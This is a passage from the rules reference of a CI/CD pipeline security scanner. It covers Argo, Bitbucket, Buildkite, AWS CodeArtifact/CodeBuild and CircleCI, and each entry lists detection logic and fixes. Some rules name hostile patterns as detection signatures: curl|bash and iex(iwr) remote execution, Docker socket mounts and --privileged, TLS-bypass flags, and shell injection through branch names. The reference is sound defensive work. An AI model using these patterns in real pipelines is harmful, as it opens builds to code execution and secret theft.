How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool. Fires only on artifact-producing Workflows.
Recommendation. Add an SBOM-generation template. syft <artifact> -o cyclonedx-json > /tmp/sbom.json runs in any standard container; cyclonedx-cli and cdxgen are alternative producers. Persist the SBOM as an output artifact so downstream templates and consumers can read it.
Source: ARGO-010 in the Argo Workflows provider.
ARGO-011: No SLSA provenance attestation produced MEDIUM
Evidences: CM-2 Baseline Configuration, SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, witness run, attest-build-provenance).
Recommendation. Add a cosign attest --predicate slsa.json --type slsaprovenance <ref> step after the build template, or use witness run to record the build environment. Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.
Source: ARGO-011 in the Argo Workflows provider.
ARGO-012: No vulnerability scanning step MEDIUM
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation.
How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is?. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, osv-scanner, govulncheck, anchore, codeql-action, semgrep, bandit, checkov, tfsec. Walks every Argo document and passes if any document includes a scanner reference.
Recommendation. Add a vulnerability scanner template. trivy fs /workdir for source / filesystem; trivy image <ref> for container images. grype, snyk, npm audit, pip-audit are alternatives. Fail the template on findings above a chosen severity so a regression blocks the merge instead of shipping.
Source: ARGO-012 in the Argo Workflows provider.
ARGO-013: Argo workflow does not opt out of SA token automount MEDIUM
Evidences: AC-6 Least Privilege, IA-5 Authenticator Management.
How this is detected. Companion to ARGO-003 (default ServiceAccount). The default SA only matters when its token is mounted; an explicit automountServiceAccountToken: false removes the token from the pod regardless of which SA the pod is bound to. Detection: workflow passes when the spec sets it to false AND every template either inherits that or sets its own automountServiceAccountToken: false. A template with it explicitly true (or unset against an unset spec-level value) is the failing shape.
Recommendation. Set spec.automountServiceAccountToken: false on the Workflow / WorkflowTemplate, or per-template (templates[].automountServiceAccountToken: false) on any template that doesn't need to talk to the Kubernetes API. An explicit false keeps a compromised step from using the workflow's SA token to escalate inside the cluster, even when the SA itself is hardened (ARGO-003), a token automounted into every pod widens the leak surface.
Known false positives.
- Templates that genuinely need to call the Kubernetes API (GitOps pull,
kubectl applyfrom inside the workflow). SetautomountServiceAccountToken: trueon that template specifically and bind it to a least-privilege SA, the rule then fires only on the broad spec-level absence, which is the actual gap.
Source: ARGO-013 in the Argo Workflows provider.
BB-001: pipe: action not pinned to exact version HIGH 🔧 fix
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Bitbucket pipes are docker-image references. Major-only (:1) or missing tags let Atlassian/the publisher swap the image contents. Full semver or sha256 digest is required.
Recommendation. Pin every pipe: to a full semver tag (e.g. atlassian/aws-s3-deploy:1.4.0) or to an immutable SHA. Floating majors like :1 can roll to new code silently.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-001 in the Bitbucket provider.
BB-002: Script injection via attacker-controllable context HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SI-7 Software, Firmware, and Information Integrity.
How this is detected. $BITBUCKET_BRANCH, $BITBUCKET_TAG, and $BITBUCKET_PR_* are populated from SCM event metadata the attacker controls. Interpolating them unquoted into a shell command lets a crafted branch or tag name can execute inline.
Recommendation. Always double-quote interpolations of ref-derived variables ("$BITBUCKET_BRANCH"). Avoid passing them to eval, sh -c, or unquoted command arguments.
Source: BB-002 in the Bitbucket provider.
BB-003: Variables contain literal secret values CRITICAL
Evidences: IA-5 Authenticator Management.
How this is detected. Scans definitions.variables and each step's variables: for entries whose KEY looks credential-shaped and whose VALUE is a literal string. AWS access keys are detected by value shape regardless of key name.
Recommendation. Store credentials as Repository / Deployment Variables in Bitbucket's Pipelines settings with the 'Secured' flag, and reference them by name. Prefer short-lived OIDC tokens for cloud access.
Source: BB-003 in the Bitbucket provider.
BB-004: Deploy step missing deployment: environment gate MEDIUM
Evidences: AC-3 Access Enforcement, SA-10 Developer Configuration Management.
How this is detected. A step whose name or invoked pipe matches deploy / release / publish / promote should declare a deployment: field so Bitbucket enforces deployment-scoped variables, approvals, and history.
Recommendation. Add deployment: production (or staging / test) to the step. Configure the matching environment in the repo's Deployments settings with required reviewers and secured variables.
Source: BB-004 in the Bitbucket provider.
BB-005: Step has no max-time, unbounded build MEDIUM 🔧 fix
Evidences: CM-6 Configuration Settings.
How this is detected. Without max-time, the step runs until Bitbucket's 120-minute global default kills it. Explicit per-step timeouts cap blast radius and cost.
Recommendation. Add max-time: <minutes> to each step, sized to the 95th percentile of historical runtime plus margin. Bounded runs limit the blast radius of a compromised build and prevent runaway minute consumption.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-005 in the Bitbucket provider.
BB-029: image: (step or service) not pinned by sha256 digest HIGH
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. BB-001 / BB-009 only inspect pipe: references inside script: lists. Step image: directives and definitions.services.<name>.image: define the runtime container the build executes inside (and the auxiliary containers the step talks to over the loopback network). Both surfaces ship code into the build context, a compromised service image (the postgres container, the selenium-grid container, …) can exfiltrate every secret the step touches just as easily as the step image itself. This rule reuses _primitives.image_pinning.classify so the floating-tag semantics match GHA-001 / GL-001 / JF-009 / ADO-009 / CC-003 / K8S-001.
Recommendation. Resolve every image: reference to its current digest (docker buildx imagetools inspect <ref> or crane digest <ref>) and pin via image: name@sha256:<digest>. Floating tags (:latest, :3, no tag) silently swap the runtime image, the build's reproducibility invariant is broken and a registry-side compromise lands inside CI without any local change.
Known false positives.
- Bitbucket-vendored helper images (
atlassian/namespace) are still treated as third-party, the registry can move the tag. Pin them too rather than suppressing the rule globally.
Source: BB-029 in the Bitbucket provider.
BK-001: Buildkite plugin not pinned to an exact version HIGH
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Buildkite resolves plugin refs at agent boot. foo#v1.2.3 locks the version; foo#main / foo does not. Detection fires on bare names, branch keywords, and partial-semver pins (v4, v4.13).
Recommendation. Pin every plugin reference to an exact tag (docker-compose#v4.13.0) or a 40-char commit SHA. Bare references (docker-compose), branch refs (#main / #master), and major-only floats (#v4) resolve to whatever is current at agent start time, which lets a compromised plugin release execute inside the pipeline.
Source: BK-001 in the Buildkite provider.
BK-002: Literal secret value in pipeline env block CRITICAL 🔧 fix
Evidences: IA-5 Authenticator Management, SC-28 Protection of Information at Rest.
How this is detected. Detection fires on values that look like AWS access keys, GitHub PATs, OpenAI keys, JWTs, or generic high-entropy tokens, plus on env-var names that imply a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) when the value is a non-empty literal rather than an interpolation ($SECRET_FROM_AGENT_HOOK).
Recommendation. Move the value out of the pipeline file. Use Buildkite's agent secrets hooks (secrets/ directory or BUILDKITE_PLUGIN_AWS_SSM_*), the aws-ssm / vault-secrets plugins, or the BUILDKITE_PIPELINE_DEFAULT_BRANCH env var pulled from a secret manager. The pipeline.yml is committed to the repo and visible to anyone with read access.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-002 in the Buildkite provider.
BK-003: Untrusted Buildkite variable interpolated in command HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Buildkite passes branch / tag / message metadata as environment variables. Putting them inside $(...) or shelling out with the value unquoted is a classic command-injection vector. The detection fires on the unquoted interpolation form and on use inside eval / $(...).
Recommendation. Don't interpolate $BUILDKITE_BRANCH, $BUILDKITE_TAG, $BUILDKITE_MESSAGE, $BUILDKITE_PULL_REQUEST_*, or $BUILDKITE_BUILD_AUTHOR* directly into shell commands. These come from the pull request / branch and are attacker-controllable. Quote them and assign to a local variable first (branch="$BUILDKITE_BRANCH"; ./script --branch "$branch"), or pass them as arguments to a script you own.
Source: BK-003 in the Buildkite provider.
BK-004: Remote script piped into shell interpreter HIGH 🔧 fix
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. The detection fires on curl|bash, curl|sh, wget|bash, iex (iwr ...), and the corresponding Invoke-WebRequest|Invoke-Expression PowerShell forms. Use curl -fsSLO <url>; sha256sum -c install.sh.sha256; bash install.sh instead.
Recommendation. Download the installer to disk, verify a checksum or signature, then execute it. curl ... | sh lets the remote host change what runs in your pipeline at any time, and any TLS / DNS error during download silently feeds a partial script to the shell.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-004 in the Buildkite provider.
BK-005: Container started with --privileged or host-bind escalation HIGH 🔧 fix
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. Detection fires on --privileged, --cap-add=SYS_ADMIN, --pid=host / --ipc=host / --userns=host, and explicit mounts of the host Docker socket (/var/run/docker.sock).
Recommendation. Drop --privileged, --cap-add=SYS_ADMIN, --pid=host, and -v /var/run/docker.sock from container invocations. If the workload needs Docker-in-Docker, use a build-specific rootless option (buildx, kaniko, buildah --isolation=chroot) instead of opening the host kernel and the agent's Docker socket to the build script.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-005 in the Buildkite provider.
BK-006: Step has no timeout_in_minutes LOW
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. Buildkite has no implicit timeout; agents will wait forever. Set timeout_in_minutes: per step. The pipeline-level default counts, a global steps: block with timeout_in_minutes: is fine, since Buildkite copies it to each step.
Recommendation. Set timeout_in_minutes: on every command step. A compromised dependency or a hung test can otherwise hold an agent indefinitely, blocking parallel pipelines and running up self-hosted-runner cost. Pick a value generous enough for the slowest legitimate run (e.g. 30 for a typical build, 90 for an integration suite).
Known false positives.
- Steps that genuinely need >24h (rare; database migrations, ML training jobs), set
timeout_in_minutes: 1440explicitly so the absence of a timeout is intentional.
Source: BK-006 in the Buildkite provider.
BK-007: Deploy step not gated by a manual block / input MEDIUM
Evidences: AC-3 Access Enforcement, SA-10 Developer Configuration Management.
How this is detected. A step is treated as a deploy when its label, key, or any command line contains a deploy keyword (deploy, ship, release, promote, apply, rollout, terraform apply, kubectl apply, helm upgrade, aws ecs update-service). The check passes when at least one preceding step in the same pipeline file is a block: or input: flow-control step.
Recommendation. Insert a - block: "Deploy?" (or - input: step) in front of every deploy step. Buildkite waits for a human to click Unblock before the gated steps run, which prevents an unreviewed merge from auto-deploying to production. Combine with branches: main so the gate only appears on release branches.
Known false positives.
- Pipelines where the deploy gate lives in a triggered pipeline rather than the local file, the local pipeline looks ungated even though the actual deploy is gated downstream. Add a no-op
block:to silence.
Source: BK-007 in the Buildkite provider.
BK-008: TLS verification disabled in step command MEDIUM 🔧 fix
Evidences: SC-8 Transmission Confidentiality and Integrity, SC-13 Cryptographic Protection.
How this is detected. Detection fires on the canonical bypass flags across curl, wget, git, npm, pip, gcloud, and openssl. The check is deliberately conservative, partial-word matches (--insecure-protocols) are excluded.
Recommendation. Drop curl -k / --insecure, wget --no-check-certificate, git -c http.sslVerify=false, and pip install --trusted-host. If a CA isn't trusted, install it into the agent's trust store (update-ca-certificates) rather than disabling validation pipeline-wide. A compromised intermediate that strips TLS gets a free hand with every fetch the step performs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-008 in the Buildkite provider.
BK-009: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Unsigned artifacts can't be verified downstream, a tampered build is indistinguishable from a legitimate one. The check recognises cosign, sigstore, slsa-github-generator, slsa-framework, and notation-sign as signing tools, matching the shared signing-token catalog used by the other CI packs.
Recommendation. Add a signing step, install cosign once (brew install cosign in the agent image, or a cosign-install plugin) and call cosign sign --yes <ref> after the build. For container images pushed to ECR / GCR / GHCR, the same call signs by digest. Publish the signature alongside the artifact and verify it at consumption time.
Source: BK-009 in the Buildkite provider.
BK-010: No SBOM generated for build artifacts MEDIUM
Evidences: CM-8 System Component Inventory, SR-4 Provenance.
How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog, syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool.
Recommendation. Add an SBOM-generation step. syft <artifact> -o cyclonedx-json > sbom.json runs in any standard agent image; cyclonedx-cli and cdxgen are alternative producers. Upload the SBOM via buildkite-agent artifact upload so downstream consumers (and incident-response tooling) can match deployed artifacts to the components they were built from.
Source: BK-010 in the Buildkite provider.
BK-011: No SLSA provenance attestation produced MEDIUM
Evidences: CM-2 Baseline Configuration, SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Without it, a leaked signing key forges identity but a leaked build environment also forges provenance. You need both for the SLSA L3 non-falsifiability guarantee. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, attest-build-provenance).
Recommendation. Run cosign attest --predicate slsa.json (or the SLSA-framework generator from a build-time step) after the build completes. The predicate records the build inputs and the agent that produced the artifact. Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.
Source: BK-011 in the Buildkite provider.
BK-012: No vulnerability scanning step MEDIUM
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation.
How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is?. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, anchore, dependency-check, checkov, semgrep.
Recommendation. Add a vulnerability scanner, trivy fs . for source / filesystem, trivy image <ref> for container images, grype and snyk for either. Add npm audit / pip-audit for language-specific dep audits. Fail the step on findings above a chosen severity so a regression blocks the merge instead of shipping.
Source: BK-012 in the Buildkite provider.
BK-013: Deploy step has no branches: filter MEDIUM
Evidences: AC-3 Access Enforcement.
How this is detected. A step is treated as a deploy when its label, key, or any command line contains a deploy keyword (deploy, ship-it, release, promote, rollout, helm upgrade, kubectl apply, terraform apply, aws ecs update-service, aws lambda update-function-code, gcloud run deploy). The check passes when the step declares branches: with at least one literal branch name (a wildcard like "*" is treated as an explicit opt-out, not a passing filter, and still trips). The pipeline-level default also counts, top-level steps: with branches: propagates.
Recommendation. Add branches: "main release/*" (or your release branch glob) to every deploy step. Buildkite skips the step on any other branch, which prevents a feature-branch PR from accidentally promoting code to production. Combine with BK-007's manual block: so a release branch plus a human approval is the path to deploy.
Known false positives.
- Trunk-based teams that branch-protect
mainand treat every merge as a deploy candidate may not usebranches:. Addbranches: mainto make the policy explicit, or ignore BK-013 in.pipeline-check-ignore.ymlwith a scope ofmain-only repos.
Source: BK-013 in the Buildkite provider.
CA-001: CodeArtifact domain not encrypted with customer KMS CMK MEDIUM
Evidences: SC-12 Cryptographic Key Establishment and Management, SC-13 Cryptographic Protection.
How this is detected. AWS-owned encryption (the default alias/aws/codeartifact key) keeps the key policy under AWS's control, not yours. That's fine for confidentiality but means cross-account auditability of every Decrypt event lives with AWS, and you can't revoke or scope key access without recreating the domain. A customer-managed CMK puts both controls back in your hands.
Recommendation. Recreate the CodeArtifact domain with an encryption-key argument pointing at a customer-managed CMK. Domain encryption is set at creation and cannot be changed after.
Source: CA-001 in the AWS provider.
CA-002: CodeArtifact repository has a public external connection HIGH
Evidences: SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. An external connection to public:npmjs / public:pypi / public:nuget / public:maven-central fetches packages from the public registry on first resolution. A typo-squat (request vs requests) or a compromised upstream lands in the cache the first time anyone names it; every subsequent build pulls the cached substitute. The pull-through cache with an allow-list is the same risk shape solved by an explicit allowlist.
Recommendation. Route public package consumption through a pull-through cache repository governed by an allow-list of package names, and point build-time repos at that cache rather than directly at public:npmjs/public:pypi. Unscoped public upstreams expose builds to dependency-confusion and typosquatting attacks.
Source: CA-002 in the AWS provider.
CA-003: CodeArtifact domain policy allows cross-account wildcard CRITICAL
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection.
How this is detected. A wildcard-principal Allow on a CodeArtifact domain lets any AWS account reach the domain's permissions surface. The exact damage depends on the action set, but at minimum it lets external accounts read package names and versions, which is enough for typosquat-against-private-package attacks. aws:PrincipalOrgID is the org-level rescue without enumerating accounts.
Recommendation. Remove Allow statements with Principal: '*' from every CodeArtifact domain permissions policy, or restrict them with an aws:PrincipalOrgID condition so only accounts in your org can consume packages from the domain.
Source: CA-003 in the AWS provider.
CA-004: CodeArtifact repo policy grants codeartifact: with Resource '' HIGH
Evidences: AC-6 Least Privilege.
How this is detected. codeartifact:* on Resource: '*' collapses the entire repository's authority into one grant: the holder can read, write, delete, dispose, and re-publish every package. Even for a service principal that nominally only consumes packages, the grant lets a compromise of that consumer rewrite every dependency the team relies on.
Recommendation. Scope Allow statements to specific codeartifact: actions (e.g. codeartifact:ReadFromRepository) and to specific package-group ARNs. Wildcard action + wildcard resource is the classic over-broad grant that lets a consumer also publish.
Source: CA-004 in the AWS provider.
CB-001: Secrets in plaintext environment variables CRITICAL
Evidences: IA-5 Authenticator Management.
How this is detected. Flags a plaintext env var when either (a) its name matches a secret-like pattern (PASSWORD, TOKEN, API_KEY, ...) or (b) its value matches a known credential shape (AKIA/ASIA access keys, GitHub tokens, Slack xox* tokens, JWTs). Plaintext values are visible in the AWS console, CloudTrail, and build logs to anyone with read access.
Recommendation. Move secrets to AWS Secrets Manager or SSM Parameter Store and reference them using type SECRETS_MANAGER or PARAMETER_STORE in the CodeBuild environment variable configuration.
Source: CB-001 in the AWS provider.
CB-002: Privileged mode enabled HIGH
Evidences: CM-6 Configuration Settings, CM-7 Least Functionality.
How this is detected. Privileged mode grants the build container root access to the host's Docker daemon. A compromised build can escape the container or tamper with the host. Only flip this on for real Docker-in-Docker workloads and keep the buildspec under branch-protected review.
Recommendation. Disable privileged mode unless the project explicitly requires Docker-in-Docker builds. If required, ensure the buildspec is tightly controlled, peer-reviewed, and sourced from a trusted repository with branch protection.
Source: CB-002 in the AWS provider.
CB-003: Build logging not enabled MEDIUM
Evidences: AU-2 Event Logging, AU-12 Audit Record Generation.
How this is detected. A CodeBuild project with neither CloudWatch Logs nor S3 logging enabled leaves no durable record of what the build did. The CodeBuild console shows the last execution's logs for a short retention window, but anything older, and any automated review of historical activity during incident response, is gone.
Recommendation. Enable CloudWatch Logs or S3 logging in the CodeBuild project configuration to maintain a durable audit trail of all build activity.
Source: CB-003 in the AWS provider.
CB-004: No build timeout configured LOW
Evidences: CM-6 Configuration Settings.
How this is detected. A CodeBuild project at AWS's 480-minute maximum is rarely deliberate. Without a tighter ceiling, a runaway test loop, a fork-PR cryptomining payload, or a build that hangs on stdin keeps the build host (and its IAM role) live for the full eight hours, racking up cost and extending the compromise window.
Recommendation. Set a build timeout appropriate for your expected build duration (typically 15–60 minutes) to limit the blast radius of a runaway or abused build.
Source: CB-004 in the AWS provider.
CB-005: Outdated managed build image MEDIUM
Evidences: CM-2 Baseline Configuration, RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation.
How this is detected. Only AWS-managed aws/codebuild/standard:N.0 images are version-checked. Custom or third-party images pass here, CB-009 handles the separate concern of tag vs digest pinning for custom images.
Recommendation. Update the CodeBuild environment image to aws/codebuild/standard:7.0 or later to ensure the build environment receives the latest security patches.
Known false positives.
- One version behind the current
aws/codebuild/standardis a hygiene warning, not a production issue, and defaults to MEDIUM confidence. The rule emits HIGH only when the project is two or more versions behind. Custom or third-party images are not version-checked here; CB-009 handles tag-vs-digest pinning for those.
Source: CB-005 in the AWS provider.
CB-006: CodeBuild source auth uses long-lived token HIGH
Evidences: IA-5 Authenticator Management.
How this is detected. OAUTH / PERSONAL_ACCESS_TOKEN / BASIC_AUTH source credentials are stored long-lived on the account and used by every CodeBuild project that points at the SCM provider. Rotating the upstream PAT requires manual re-credentialing here too. CodeConnections (CodeStar) is the AWS-managed alternative with token refresh and revocation.
Recommendation. Switch to an AWS CodeConnections (CodeStar) connection and reference it from the source configuration. Delete any stored source credentials of type OAUTH, PERSONAL_ACCESS_TOKEN, or BASIC_AUTH via delete_source_credentials.
Source: CB-006 in the AWS provider.
CB-007: CodeBuild webhook has no filter group MEDIUM
Evidences: CM-6 Configuration Settings, CM-7 Least Functionality.
How this is detected. A CodeBuild webhook with no filter groups fires on every push and every PR from any actor, including fork PRs from outside the org. Anyone able to open a PR triggers the build with whatever IAM authority the project's role carries. Filter groups (branch + actor + event type) are the gate.
Recommendation. Define filter groups restricting triggers to specific branches, actors, and event types.
Source: CB-007 in the AWS provider.
CC-001: Orb not pinned to exact semver HIGH 🔧 fix
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Orb references in the orbs: block must include an @x.y.z suffix to lock a specific version. References without @, with @volatile, or with only a major (@1) or major.minor (@5.1) version float and can silently pull in malicious updates.
Recommendation. Pin every orb to an exact semver version (circleci/node@5.1.0). Floating references like @volatile, @1, or bare names without @ resolve to whatever is latest at build time, allowing a compromised orb update to execute in the pipeline.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-001 in the CircleCI provider.
CC-002: Script injection via untrusted environment variable HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SA-15 Development Process, Standards, and Tools.
How this is detected. CircleCI exposes environment variables like $CIRCLE_BRANCH, $CIRCLE_TAG, and $CIRCLE_PR_NUMBER that are controlled by the event source (branch name, tag, PR). Interpolating them unquoted into run: commands allows shell injection via specially crafted branch or tag names.
Recommendation. Do not interpolate attacker-controllable environment variables (CIRCLE_BRANCH, CIRCLE_TAG, CIRCLE_PR_NUMBER, etc.) directly into shell commands. Pass them through an intermediate variable and quote them, or use CircleCI pipeline parameters instead.
Source: CC-002 in the CircleCI provider.
CC-003: Docker image not pinned by digest HIGH
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Docker images referenced in docker: blocks under jobs or executors must include an @sha256:... digest suffix. Tag-only references (:latest, :18) are mutable and can be replaced at any time by whoever controls the upstream registry.
Recommendation. Pin every Docker image to its sha256 digest: cimg/node:18@sha256:abc123.... Tags like :latest or :18 are mutable, a registry compromise or upstream push silently replaces the image content.
Source: CC-003 in the CircleCI provider.
CC-004: Secret-like environment variable not managed via context MEDIUM
Evidences: IA-5 Authenticator Management.
How this is detected. Jobs that declare environment variables with secret-looking names (containing PASSWORD, TOKEN, SECRET, or API_KEY) in inline environment: blocks bypass CircleCI's context restrictions, security groups, OIDC claims, and audit logs are only enforced when secrets live in contexts.
Recommendation. Move secret-like variables (PASSWORD, TOKEN, SECRET, API_KEY) into a CircleCI context and reference the context in the workflow job configuration. Contexts support security groups and audit logging that inline environment: blocks lack.
Source: CC-004 in the CircleCI provider.
CC-005: AWS auth uses long-lived access keys in environment block MEDIUM 🔧 fix
Evidences: IA-5 Authenticator Management.
How this is detected. Long-lived AWS access keys declared directly in a job's environment: block are visible to anyone who can read the config. They cannot be rotated automatically and remain valid until manually revoked. OIDC-based federation yields short-lived credentials per build.
Recommendation. Remove AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from the job environment: block. Use CircleCI's OIDC token with aws-cli/setup orb's role-based auth, or store credentials in a context with security group restrictions.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-005 in the CircleCI provider.
CC-006: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Unsigned artifacts cannot be verified downstream, so a tampered build is indistinguishable from a legitimate one. The check recognises cosign, sigstore, slsa-framework, and notation-sign as signing tools.
Recommendation. Add a signing step to the pipeline, e.g. install cosign and run cosign sign, or use the sigstore CLI. Publish the signature alongside the artifact and verify it at consumption time.
Source: CC-006 in the CircleCI provider.
CC-007: SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) MEDIUM
Evidences: CM-8 System Component Inventory, SR-4 Provenance.
How this is detected. Without an SBOM, downstream consumers cannot audit the exact set of dependencies shipped in the artifact, delaying vulnerability response when a transitive dep is disclosed. The check recognises CycloneDX, syft, Anchore SBOM action, spdx-sbom-generator, Microsoft sbom-tool, and Trivy in SBOM mode.
Recommendation. Add an SBOM generation step, syft . -o cyclonedx-json, Trivy with --format cyclonedx, or Microsoft's sbom-tool. Attach the SBOM to the build artifacts so consumers can ingest it into their vulnerability management pipeline.
Source: CC-007 in the CircleCI provider.
CC-008: Credential-shaped literal in config body CRITICAL 🔧 fix
Evidences: IA-5 Authenticator Management.
How this is detected. Every string in the config is scanned against a set of credential patterns (AWS access keys, GitHub tokens, Slack tokens, JWTs, Stripe, Google, Anthropic, etc.). A match means a secret was pasted into YAML, the value is visible in every fork and every build log and must be treated as compromised.
Recommendation. Rotate the exposed credential immediately. Move the value to a CircleCI project environment variable or a context and reference it via the variable name. For cloud access, prefer OIDC federation over long-lived keys.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example
AKIAIOSFODNN7EXAMPLEis deliberately NOT suppressed, if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: CC-008 in the CircleCI provider.
CC-009: Deploy job missing manual approval gate MEDIUM
Evidences: SA-10 Developer Configuration Management, SA-15 Development Process, Standards, and Tools.
How this is detected. In CircleCI, manual approval is implemented by adding a job with type: approval to the workflow and making the deploy job require it. Without this gate, any push to the triggering branch deploys immediately with no human review.
Recommendation. Add a type: approval job that precedes the deploy job in the workflow, and list it in the deploy job's requires:. This ensures a human must click Approve in the CircleCI UI before production changes roll out.
Source: CC-009 in the CircleCI provider.
CC-010: Self-hosted runner without ephemeral marker MEDIUM
Evidences: CM-6 Configuration Settings, CM-7 Least Functionality.
How this is detected. Self-hosted runners that persist between jobs leak filesystem and process state. A PR-triggered job writes to /tmp; a subsequent prod-deploy job on the same runner reads it. The check looks for resource_class values containing 'self-hosted', if found, it checks for 'ephemeral' in the value. Also checks for machine: true combined with a self-hosted resource class.
Recommendation. Configure self-hosted runners to tear down between jobs. Use a resource_class value that includes an ephemeral marker, or use CircleCI's machine executor with runner auto-scaling so each job gets a fresh environment.
Source: CC-010 in the CircleCI provider.
CC-011: No store_test_results step (test results not archived) LOW
Evidences: AU-2 Event Logging, AU-12 Audit Record Generation.
How this is detected. Without store_test_results, test output is only available in the raw build log. Archiving test results enables CircleCI's test insights, timing-based splitting, and provides an audit trail that links each build to its test outcomes.
Recommendation. Add a store_test_results step to jobs that run tests. This archives test results in CircleCI for traceability, trend analysis, and debugging flaky tests.
Source: CC-011 in the CircleCI provider.
CC-012: Dynamic config via setup: true enables code injection MEDIUM
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SA-15 Development Process, Standards, and Tools.
How this is detected. When setup: true is set at the top level, the config becomes a setup workflow. It generates the real pipeline config dynamically (typically via the circleci/continuation orb). An attacker who controls the setup job (e.g. via a malicious PR in a fork) can inject arbitrary config for all subsequent jobs, including deploy steps with production secrets.
Recommendation. If setup: true is required, restrict the setup job to a trusted branch filter and audit the generated config carefully. Ensure the continuation orb's configuration_path points to a checked-in file, not a dynamically generated one that could be influenced by PR content.
Source: CC-012 in the CircleCI provider.
CC-013: Deploy job in workflow has no branch filter MEDIUM
Evidences: SA-10 Developer Configuration Management.
How this is detected. Without branch filters, a deploy job triggers on every branch push, including feature branches and forks. Restricting sensitive jobs to specific branches limits the blast radius of a compromised commit.
Recommendation. Add filters.branches.only to deploy-like workflow jobs so they only run on protected branches (e.g. main, release/*).
Source: CC-013 in the CircleCI provider.
CC-014: Job missing resource_class declaration MEDIUM
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. Without an explicit resource_class, CircleCI assigns a default executor. Declaring the class documents the expected scope and prevents accidental use of larger (or self-hosted) executors that may have elevated privileges.
Recommendation. Add resource_class: to every job to explicitly control the executor size and capabilities. Use the smallest class that satisfies build requirements.
Source: CC-014 in the CircleCI provider.
CC-015: No no_output_timeout configured MEDIUM 🔧 fix
Evidences: CM-6 Configuration Settings.
